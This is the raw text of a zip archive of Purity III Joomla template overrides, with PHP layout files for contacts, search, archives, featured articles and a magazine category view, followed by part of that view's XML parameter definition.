					<?php if ($this->params->get('show_image_heading')) : ?>
						<?php $contact_width = 7; ?>
						<div class="span2 col-md-2">
							<?php if ($this->items[$i]->image) : ?>
								<a href="<?php echo JRoute::_(ContactHelperRoute::getContactRoute($item->slug, $item->catid)); ?>">
									<?php echo JHtml::_('image', $this->items[$i]->image, JText::_('COM_CONTACT_IMAGE_DETAILS'), array('class' => 'contact-thumbnail img-thumbnail')); ?></a>
							<?php endif; ?>
						</div>
					<?php else : ?>
						<?php $contact_width = 9; ?>
					<?php endif; ?>

					<div class="list-title span<?php echo $contact_width; ?> col-md-<?php echo $contact_width; ?>">
						<a href="<?php echo JRoute::_(ContactHelperRoute::getContactRoute($item->slug, $item->catid)); ?>">
							<?php echo $item->name; ?></a>
						<?php if ($this->items[$i]->published == 0) : ?>
							<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
						<?php endif; ?>
						<?php echo $item->event->afterDisplayTitle; ?>

						<?php echo $item->event->beforeDisplayContent; ?>

						<?php if ($this->params->get('show_position_headings')) : ?>
								<?php echo $item->con_position; ?><br />
						<?php endif; ?>
						<?php if ($this->params->get('show_email_headings')) : ?>
								<?php echo $item->email_to; ?><br />
						<?php endif; ?>
						<?php $location = array(); ?>
						<?php if ($this->params->get('show_suburb_headings') && !empty($item->suburb)) : ?>
							<?php $location[] = $item->suburb; ?>
						<?php endif; ?>
						<?php if ($this->params->get('show_state_headings') && !empty($item->state)) : ?>
							<?php $location[] = $item->state; ?>
						<?php endif; ?>
						<?php if ($this->params->get('show_country_headings') && !empty($item->country)) : ?>
							<?php $location[] = $item->country; ?>
						<?php endif; ?>
						<?php echo implode(', ', $location); ?>
					</div>

					<div class="span3 col-md-3">
						<?php if ($this->params->get('show_telephone_headings') && !empty($item->telephone)) : ?>
							<?php echo JText::sprintf('COM_CONTACT_TELEPHONE_NUMBER', $item->telephone); ?><br />
						<?php endif; ?>

						<?php if ($this->params->get('show_mobile_headings') && !empty ($item->mobile)) : ?>
								<?php echo JText::sprintf('COM_CONTACT_MOBILE_NUMBER', $item->mobile); ?><br />
						<?php endif; ?>

						<?php if ($this->params->get('show_fax_headings') && !empty($item->fax) ) : ?>
							<?php echo JText::sprintf('COM_CONTACT_FAX_NUMBER', $item->fax); ?><br />
						<?php endif; ?>
					</div>

					<?php echo $item->event->afterDisplayContent; ?>
				</li>
				<?php endif; ?>
			<?php endforeach; ?>
		</ul>

		<?php if ($this->params->get('show_pagination', 2)) : ?>
		<div class="pagination">
			<?php $counter_ = $this->pagination->getPagesCounter();
			if (!empty($counter_)) : ?>
				<p class="counter">
					<?php echo $counter_; ?>
				</p>
			<?php endif; ?>
			<?php echo $this->pagination->getPagesLinks(); ?>
		</div>
		<?php endif; ?>
		<div>
			<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
			<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
		</div>
</form>
<?php endif; ?>
PKӜ�\�6�/purity_iii/html/com_contact/category/index.htmlnu&1i�<!DOCTYPE html><title></title>PKӜ�\߄�B  purity_iii/html/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\~r|���&purity_iii/html/mod_search/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_search
 *
 * @copyright   Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<form class="form-search" action="<?php echo JRoute::_('index.php');?>" method="post">
	<div class="search<?php echo $moduleclass_sfx ?>">
		<?php
			$output = '<label for="mod-search-searchword">'.$label.'</label><i class="fa fa-search"></i><input name="searchword" id="mod-search-searchword" maxlength="'.$maxlength.'"  class="form-control '.$moduleclass_sfx.'" type="text" size="'.$width.'" />';

			if ($button) :
				if ($imagebutton) :
					$button = ' <input type="image" value="' . $button_text . '" class="button' . $moduleclass_sfx.'" src="' . $img . '" onclick="this.form.searchword.focus();"/>';
				else :
					$button = ' <button class="button' . $moduleclass_sfx . ' btn btn-primary" onclick="this.form.searchword.focus();">' . $button_text . '</button>';
				endif;
			else :
				$button = '';
			endif;

			switch ($button_pos) :
				case 'top' :
					$button = $button.'<br />';
					$output = $button.$output;
					break;

				case 'bottom' :
					$button = '<br />'.$button;
					$output = $output.$button;
					break;

				case 'right' :
					$output = $output.$button;
					break;

				case 'left' :
				default :
					$output = $button.$output;
					break;
			endswitch;

			echo $output;
		?>
	<input type="hidden" name="task" value="search" />
	<input type="hidden" name="option" value="com_search" />
	<input type="hidden" name="Itemid" value="<?php echo $mitemid; ?>" />
	</div>
</form>
PKӜ�\�V�%purity_iii/html/mod_search/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\��T??0purity_iii/html/mod_articles_archive/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_articles_archive
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<?php if (!empty($list)) :?>
	<ul class="archive-module<?php echo $moduleclass_sfx; ?>">
	<?php foreach ($list as $item) : ?>
	<li>
    <i class="fa fa-calendar"></i>
		<a href="<?php echo $item->link; ?>">
			<?php echo $item->text; ?>
		</a>
	</li>
	<?php endforeach; ?>
</ul>
<?php endif; ?>
PKӜ�\�V�/purity_iii/html/mod_articles_archive/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\߄�B  ,purity_iii/html/com_finder/search/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKӜ�\�K�77-purity_iii/html/com_finder/search/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_finder
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE
 */

defined('_JEXEC') or die;

JHtml::_('behavior.framework', true);

JHtml::_('behavior.core');
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');
JHtml::stylesheet('com_finder/finder.css', false, true, false);
?>

<div class="finder<?php echo $this->pageclass_sfx; ?>">
<?php if ($this->params->get('show_page_heading')) : ?>
<h1>
	<?php if ($this->escape($this->params->get('page_heading'))) : ?>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	<?php else : ?>
		<?php echo $this->escape($this->params->get('page_title')); ?>
	<?php endif; ?>
</h1>
<?php endif; ?>

<?php if ($this->params->get('show_search_form', 1)) : ?>
	<div id="search-form">
		<?php echo $this->loadTemplate('form'); ?>
	</div>
<?php endif;

// Load the search results layout if we are performing a search.
if ($this->query->search === true):
?>
	<div id="search-results">
		<?php echo $this->loadTemplate('results'); ?>
	</div>
<?php endif; ?>
</div>

<script>
    (function($) {
        $(document).ready(function() {
            $('#q', '#finder-search').on('keyup', function(e) {
                if ($(this).val().length) {
                    $('#smartsearch-btn').removeClass('disabled');
                } else {
                    $('#smartsearch-btn').addClass('disabled');
                }
            });
        })
    } (jQuery))
</script>
PKԜ�\߄�B  %purity_iii/html/com_finder/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKԜ�\���~6purity_iii/html/com_content/featured/default_links.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>
<ol class="nav">
<?php foreach ($this->link_items as &$item) : ?>
	<li>
		<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catslug)); ?>">
			<?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>
PKԜ�\/�z�v
v
0purity_iii/html/com_content/featured/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
use Joomla\CMS\Language\Text;

if(!class_exists('ContentHelperRoute')){
	if(version_compare(JVERSION, '4', 'ge')){
		abstract class ContentHelperRoute extends \Joomla\Component\content\Site\Helper\RouteHelper{};
	}else{
		JLoader::register('ContentHelperRoute', $com_path . '/helpers/route.php');
	}
}

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::addIncludePath(T3_PATH.'/html/com_content');
JHtml::addIncludePath(dirname(dirname(__FILE__)));
if (version_compare(JVERSION, '4', 'lt')) {
	JHtml::_('behavior.caption');
}
$this->columns = !empty($this->columns) ? $this->columns : $this->params->get('num_columns','1');

// If the page class is defined, add to class as suffix.
// It will be a separate class if the user starts it with a space
?>
<div class="blog-featured<?php echo $this->pageclass_sfx; ?>" itemscope itemtype="https://schema.org/Blog">
<?php if ($this->params->get('show_page_heading') != 0) : ?>
<div class="page-header">
	<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
</div>
<?php endif; ?>

<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading clearfix <?php echo $this->params->get('blog_class_leading'); ?>">
	<?php foreach ($this->lead_items as &$item) : ?>
		<div class="leading leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</div>
		<?php
			$leadingcount++;
		?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php
	$introcount = (count($this->intro_items));
	$counter = 0;
?>
<?php if (!empty($this->intro_items)) : ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>

		<?php
		$key = ($key - $leadingcount) + 1;
		$rowcount = (((int) $key - 1) % (int) $this->columns) + 1;
		$row = $counter / $this->columns;

		if ($rowcount == 1) : ?>

		<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-'.$row; ?> row">
		<?php endif; ?>
			<div class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?> col-md-<?php echo round((12 / $this->columns));?>">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
			</div>
			<?php $counter++; ?>

			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>

		</div>
		<?php endif; ?>

	<?php endforeach; ?>
<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<section class="items-more">
		<h3><?php echo Text::_('COM_CONTENT_MORE_ARTICLES'); ?></h3>
		<?php echo $this->loadTemplate('links'); ?>
	</section>
<?php endif; ?>

<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->get('pages.total') > 1)) : ?>
	<nav class="pagination-wrap">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<div class="counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</div>
		<?php  endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
	</nav>
<?php endif; ?>

</div>
PKԜ�\�Yqq5purity_iii/html/com_content/featured/default_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Factory;
use Joomla\Component\Content\Administrator\Extension\ContentComponent;

// Create a shortcut for params.
$params  = & $this->item->params;
$images  = json_decode($this->item->images);
$canEdit = $this->item->params->get('access-edit');
$info    = $params->get('info_block_position', 2);
$icons = ($params->get('show_print_icon') ||
	$params->get('show_email_icon') ||
	$canEdit);
$aInfo1 = ($params->get('show_publish_date') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author'));
$aInfo2 = ($params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_hits'));
$topInfo = ($aInfo1 && $info != 1) || ($aInfo2 && $info == 0);
$botInfo = ($aInfo1 && $info == 1) || ($aInfo2 && $info != 0);
$icons = $params->get('access-edit') || $params->get('show_print_icon') || $params->get('show_email_icon');

$currentDate   = Factory::getDate()->format('Y-m-d H:i:s');
$isUnpublished = ($this->item->state == ContentComponent::CONDITION_UNPUBLISHED || $this->item->publish_up > $currentDate)
    || ($this->item->publish_down < $currentDate && $this->item->publish_down !== null);
?>

	<?php if ($isUnpublished) : ?>
		<div class="system-unpublished">
	<?php endif; ?>

	<!-- Article -->
	<article>

		<?php if ($params->get('show_title')) : ?>
			<?php echo JLayoutHelper::render('joomla.content.item_title', array('item' => $this->item, 'params' => $params, 'title-tag'=>'h2')); ?>
		<?php endif; ?>

		    <!-- Aside -->
		    <?php if ($topInfo || $icons) : ?>
		    <aside class="article-aside clearfix">
		      <?php if ($topInfo): ?>
		      <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
		      <?php endif; ?>
		      
		      <?php if ($icons): ?>
		      <?php echo JLayoutHelper::render('joomla.content.icons', array('item' => $this->item, 'params' => $params)); ?>
		      <?php endif; ?>
		    </aside>  
		    <?php endif; ?>
		    <!-- //Aside -->

				<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>

				<?php if (!$params->get('show_intro')) : ?>
					<?php echo $this->item->event->afterDisplayTitle; ?>
				<?php endif; ?>

				<?php echo $this->item->event->beforeDisplayContent; ?>

				<section class="article-intro clearfix">
					<?php echo $this->item->introtext; ?>
				</section>
    
		    <!-- footer -->
		    <?php if ($botInfo) : ?>
		    <footer class="article-footer clearfix">
		      <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
		    </footer>
		    <?php endif; ?>
		    <!-- //footer -->

			    <?php if ($params->get('show_tags', 1) && !empty($this->item->tags)) : ?>
			      <?php echo JLayoutHelper::render('joomla.content.tags', $this->item->tags->itemTags); ?>
			    <?php endif; ?>

				<?php if ($params->get('show_readmore') && $this->item->readmore) :
					if ($params->get('access-view')) :
						$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid));
					else :
						$menu      = JFactory::getApplication()->getMenu();
						$active    = $menu->getActive();
						$itemId    = $active->id;
						$link1     = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
						$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid));
						$link      = new JURI($link1);
						$link->setVar('return', base64_encode($returnURL));
					endif;
					?>
					<section class="readmore">
						<a class="btn btn-default" href="<?php echo $link; ?>">
							<span>
							<?php if (!$params->get('access-view')) :
								echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
							elseif ($readmore = $this->item->alternative_readmore) :
								echo $readmore;
								if ($params->get('show_readmore_title', 0) != 0) :
									echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
								endif;
							elseif ($params->get('show_readmore_title', 0) == 0) :
								$readmoreText = version_compare(JVERSION, '4', 'ge') ? JText::_('JGLOBAL_READ_MORE') : JText::_('COM_CONTENT_READ_MORE_TITLE');
            		echo $readmoreText;
							else :
								$readmoreShowTitle = version_compare(JVERSION, '4', 'ge') ? JText::sprintf('JGLOBAL_READ_MORE_TITLE', HTMLHelper::_('string.truncate', $this->item->title, $params->get('readmore_limit'))) : JText::_('COM_CONTENT_READ_MORE') ." ".HTMLHelper::_('string.truncate', $this->item->title, $params->get('readmore_limit'));
            		echo $readmoreShowTitle;
							endif; ?>
							</span>
						</a>
					</section>
				<?php endif; ?>
	</article>
	<!-- //Article -->

	<?php if ($isUnpublished) : ?>
		</div>
	<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>PKԜ�\wtW�/purity_iii/html/com_content/featured/index.htmlnu&1i�<html><body></body></html>PKԜ�\�V�&purity_iii/html/com_content/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKԜ�\l�<gg<purity_iii/html/com_content/category/features-intro_item.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;?>
<?php
// Create a shortcut for params.
$params = $this->item->params;
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');
$canEdit = $this->item->params->get('access-edit');
JHtml::_('behavior.framework');
$attribs = new JRegistry($this->item->attribs);
$images = json_decode($this->item->images);
$has_intro_image = (isset($images->image_intro) && !empty($images->image_intro));

?>

<div class="row-feature <?php echo $attribs->get('extra-class') ?> clearfix">

	<div class="container<?php echo $this->item->state == 0 ? ' system-unpublished' : null; ?>">

		<?php if ($this->item->state == 0) : ?>
			<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
		<?php endif; ?>

		<!-- Intro image -->
		<?php if ($has_intro_image) echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>

		<div class="<?php if ($has_intro_image): ?><?php endif ?>feature-ct pd-feature-ct">
			<?php if ($attribs->get('show_title', 1)) : ?>
				<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>
			<?php endif ?>

			<?php echo $this->item->introtext; ?>
		</div>


	</div>
</div>PKԜ�\:�`446purity_iii/html/com_content/category/magazine_list.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;

$params     = $this->params;
$useDefList =
	($params->get('show_modify_date') ||
		$params->get('show_publish_date') ||
		$params->get('show_create_date') ||
		$params->get('show_hits') ||
		$params->get('show_category') ||
		$params->get('show_parent_category') ||
		$params->get('show_author'));
$cols       = $params->get('highlight_columns', 2);
$positions  = $params->get('featured_info_positions', array());
$col_width  = round(12 / $cols);

JPluginHelper::importPlugin('content');
?>

<?php foreach ($this->categories as $cat) : ?>

	<?php
	$items = $this->list[$cat->id];
	$i     = 0;
	foreach ($items as $item)
	{
		$item->slug = $item->alias ? ($item->id . ':' . $item->alias) : $item->id;

		$item->parent_slug = ($item->parent_alias) ? ($item->parent_id . ':' . $item->parent_alias) : $item->parent_id;

		// No link for ROOT category
		if ($item->parent_alias == 'root')
		{
			$item->parent_slug = null;
		}

		$item->catslug = $item->category_alias ? ($item->catid.':'.$item->category_alias) : $item->catid;
		$item->event   = new stdClass;

		// Old plugins: Ensure that text property is available
		if (!isset($item->text))
		{
			$item->text = $item->introtext;
		}

		jFactory::getApplication()->triggerEvent('onContentPrepare', array ('com_content.category', &$item, &$this->params, 0));

		// Old plugins: Use processed text as introtext
		$item->introtext = $item->text;

		$results = jFactory::getApplication()->triggerEvent('onContentAfterTitle', array('com_content.category', &$item, &$item->params, 0));
		$item->event->afterDisplayTitle = trim(implode("\n", $results));

		$results = jFactory::getApplication()->triggerEvent('onContentBeforeDisplay', array('com_content.category', &$item, &$item->params, 0));
		$item->event->beforeDisplayContent = trim(implode("\n", $results));

		$results = jFactory::getApplication()->triggerEvent('onContentAfterDisplay', array('com_content.category', &$item, &$item->params, 0));
		$item->event->afterDisplayContent = trim(implode("\n", $results));
	}
	?>

<div class="magazine-category">

	<div class="magazine-category-title">
		<a href="<?php echo JRoute::_(ContentHelperRoute::getCategoryRoute($cat->id));?>" title="<?php echo $cat->title;?>">
			<strong><?php echo $cat->title;?></strong> <i class="fa fa-arrow-circle-right"></i>
		</a>
	</div>

	<?php foreach ($items as $item) : ?>
		<?php	if ($i == 0): /* start new row */ ?>
			<div class="row row-articles">
		<?php endif ?>
		<div class="col-xs-12 col-sm-<?php echo $col_width ?> magazine-item">
			<div class="row">

				<div class="col-md-4 magazine-item-media">
					<?php echo JLayoutHelper::render('joomla.content.intro_image', $item); ?>
				</div>

				<div class="col-md-8">
					<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>

					<?php if ($useDefList && in_array('highlight', $positions) && in_array($params->get('info_block_position', 0), array(0, 2))) : ?>
						<aside class="article-aside clearfix">
							<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
						</aside>
					<?php endif; ?>

					<?php if (!$params->get('show_highlight_intro', 1)) : ?>
						<?php echo $item->event->afterDisplayTitle; ?>
					<?php endif; ?>
					<?php echo $item->event->beforeDisplayContent; ?>

					<?php if ($params->get('show_highlight_intro', 1)) : ?>
					<div class="magazine-item-ct">
						<?php echo $item->introtext; ?>
					</div>
					<?php endif; ?>

					<?php if ($useDefList && in_array('highlight', $positions) && in_array($params->get('info_block_position', 0), array(1, 2))) : ?>
						<aside class="article-aside clearfix">
							<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'below')); ?>
						</aside>
					<?php endif; ?>
				  
				  <?php if ($params->get('show_readmore') && $item->readmore) :
				    if ($params->get('access-view')) :
				      $link = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language));
				    else :
				      $menu = JFactory::getApplication()->getMenu();
				      $active = $menu->getActive();
				      $itemId = $active->id;
				      $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
				      $link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)));
				    endif; ?>

				    <?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $item, 'params' => $params, 'link' => $link)); ?>

				  <?php endif; ?>

					<?php echo $item->event->afterDisplayContent; ?>
				</div>

			</div>
		</div>
		<?php	if ($i == $cols -1): /* close row */ ?>
			</div>
		<?php endif ?>
		<?php if (++$i >= $cols) $i = 0; ?>
	<?php endforeach; ?>

	<?php	if ($i > 0): /* close row */ ?>
		</div>
	<?php endif ?>

	</div>

<?php endforeach ?>PKԜ�\R��1purity_iii/html/com_content/category/magazine.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;

require_once T3_TEMPLATE_PATH . '/helper.php';

// get featured items
$app      = JFactory::getApplication();
$params   = $this->params;
$parentid = $app->input->getInt('id');

$featured_count = $params->get('featured_leading', 1) + $params->get('featured_intro', 3) + $params->get('featured_links', 5);
$featured_items = JATemplateHelper::getArticles($params, $parentid, $featured_count, 'only');

// get child categories
$categories = JATemplateHelper::getCategories($parentid);

// get list articles for each sub cat
$list_items = array();
foreach ($categories as $cat) {
	$list_items[$cat->id] = JATemplateHelper::getArticles($params, $cat->id, $params->get('highlight_count', 4));
}
?>

<?php
$this->items = $featured_items;
echo $this->loadTemplate('featured'); ?>

<?php
$this->list = $list_items;
$this->categories = $categories;
echo $this->loadTemplate('list'); ?>
PKԜ�\�(H�.F.F1purity_iii/html/com_content/category/magazine.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metadata>
	<layout title="xLayout - Magazine" option="COM_CONTENT_CATEGORY_VIEW_BLOG_OPTION">
		<help
			key="JHELP_MENUS_MENU_ITEM_ARTICLE_CATEGORY_BLOG"/>
		<message>
			<![CDATA[COM_CONTENT_CATEGORY_VIEW_BLOG_DESC]]>
		</message>
	</layout>

	<!-- Add fields to the request variables for the layout. -->
	<fields name="request">
		<fieldset name="request">

			<field name="id" type="category"
						 description="JGLOBAL_CHOOSE_CATEGORY_DESC"
						 extension="com_content"
						 label="JGLOBAL_CHOOSE_CATEGORY_LABEL"
						 required="true"/>

		</fieldset>
	</fields>

	<!-- Add fields to the parameters object for the layout. -->
	<fields name="params">
		<fieldset name="basic" label="TPL_MAGAZINE_HOME_LABEL">
			<field name="layout_type" type="hidden" default="blog"/>

			<field name="magazine_home_feature" type="spacer" class="text"
						 label="TPL_MAGAZINE_HOME_FEATURE_CONFIG_LABEL"
				/>

			<field name="featured_leading" type="text"
						 description="JGLOBAL_NUM_LEADING_ARTICLES_DESC"
						 label="JGLOBAL_NUM_LEADING_ARTICLES_LABEL"
						 size="3"
						 default="1"
				/>

			<field name="featured_intro" type="text"
						 description="JGLOBAL_NUM_INTRO_ARTICLES_DESC"
						 label="JGLOBAL_NUM_INTRO_ARTICLES_LABEL"
						 size="3"
						 default="3"
				/>

			<field name="featured_intro_columns" type="text"
						 description="TPL_MAGAZINE_FEATURED_NUM_COLUMNS_DESC"
						 label="TPL_MAGAZINE_FEATURED_NUM_COLUMNS_LABEL"
						 size="3"
						 default="3"
				/>

			<field name="featured_links" type="text"
						 description="TPL_MAGAZINE_FEATURED_NUM_LINKS_DESC"
						 label="TPL_MAGAZINE_FEATURED_NUM_LINKS_LABEL"
						 size="3"
						 default="5"
				/>

			<field name="magazine_home_category_list" type="spacer" class="text"
						 label="TPL_MAGAZINE_HOME_CATEGORY_LIST_CONFIG_LABEL"
				/>

			<field name="highlight_count" type="text"
						 description="TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_DESC"
						 label="TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_LABEL"
						 size="3"
						 default="4"
				/>

			<field name="highlight_columns" type="text"
						 description="TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_DESC"
						 label="TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_LABEL"
						 size="3"
						 default="2"
				/>

			<field name="show_highlight_intro" type="list"
						 description="TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_DESC"
						 label="TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_LABEL"
						 default="1"
				>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>


            <field name="magazine_home_option" type="spacer" class="text"
                   label="TPL_MAGAZINE_HOME_CONFIG_LABEL"
                    />

            <field name="article_ordering" type="list"
                   default="publish_up"
                   label="JGLOBAL_ARTICLE_ORDER_LABEL"
                   description="JGLOBAL_ARTICLE_ORDER_DESC"
                    >
                <option value="a.ordering">JGLOBAL_ORDERING</option>
                <option value="fp.ordering">COM_CONTENT_FEATURED_ORDER</option>
                <option value="a.hits">JGLOBAL_MOST_HITS</option>
                <option value="a.title">JGLOBAL_TITLE_ALPHABETICAL</option>
                <option value="a.created">JGLOBAL_CREATED</option>
                <option value="modified">JGLOBAL_MODIFIED</option>
                <option value="publish_up">JPUBLISHED</option>
            </field>

            <field name="article_ordering_direction" type="list"
                   default="DESC"
                   label="TPL_ORDER_DIRECTION_LABEL"
                   description="TPL_ORDER_DIRECTION_DESC"
                    >
                <option value="DESC">TPL_ORDER_DIRECTION_DESCENDING_VALUE</option>
                <option value="ASC">TPL_ORDER_DIRECTION_ASCENDING_VALUE</option>
            </field>

            <field name="featured_info_positions" type="list"
                   multiple="true"
                   description="TPL_MAGAZINE_ENTRY_INTRO_POSITION_DESC"
                   label="TPL_MAGAZINE_ENTRY_INTRO_POSITION_LABEL"
                    >
                <option value=""></option>
                <option value="leading">TPL_MAGAZINE_ENTRY_INTRO_POS_FEATURED</option>
                <option value="intro">TPL_MAGAZINE_ENTRY_INTRO_POS_INTRO</option>
                <option value="link">TPL_MAGAZINE_ENTRY_INTRO_POS_LINKS</option>
                <option value="highlight">TPL_MAGAZINE_ENTRY_INTRO_POS_HIGHLIGHT</option>
            </field>

		</fieldset>
		<fieldset name="magazine_subcategory" label="TPL_MAGAZINE_SUB_LABEL">

			<field name="subcategory_layout" type="spacer" class="text"
						 label="TPL_MAGAZINE_SUB_CONFIG_LABEL"
				/>

			<field name="num_leading_articles" type="text"
						 description="JGLOBAL_NUM_LEADING_ARTICLES_DESC"
						 label="JGLOBAL_NUM_LEADING_ARTICLES_LABEL"
						 size="3"
				/>

			<field name="num_intro_articles" type="text"
						 description="JGLOBAL_NUM_INTRO_ARTICLES_DESC"
						 label="JGLOBAL_NUM_INTRO_ARTICLES_LABEL"
						 size="3"
				/>

			<field name="num_columns" type="text"
						 label="JGLOBAL_NUM_COLUMNS_LABEL"
						 size="3"
				/>

			<field name="num_links" type="text"
						 description="JGLOBAL_NUM_LINKS_DESC"
						 label="JGLOBAL_NUM_LINKS_LABEL"
						 size="3"
				/>

            <field name="orderby_pri" type="list"
                   description="JGLOBAL_CATEGORY_ORDER_DESC"
                   label="JGLOBAL_CATEGORY_ORDER_LABEL"
                    >
                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="none">JGLOBAL_NO_ORDER</option>
                <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
                <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
                <option value="order">JGLOBAL_CATEGORY_MANAGER_ORDER</option>
            </field>

            <field name="orderby_sec" type="list"
                   description="JGLOBAL_ARTICLE_ORDER_DESC"
                   label="JGLOBAL_ARTICLE_ORDER_LABEL"
                    >
                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="front">COM_CONTENT_FEATURED_ORDER</option>
                <option value="rdate">JGLOBAL_MOST_RECENT_FIRST</option>
                <option value="date">JGLOBAL_OLDEST_FIRST</option>
                <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
                <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
                <option value="author">JGLOBAL_AUTHOR_ALPHABETICAL</option>
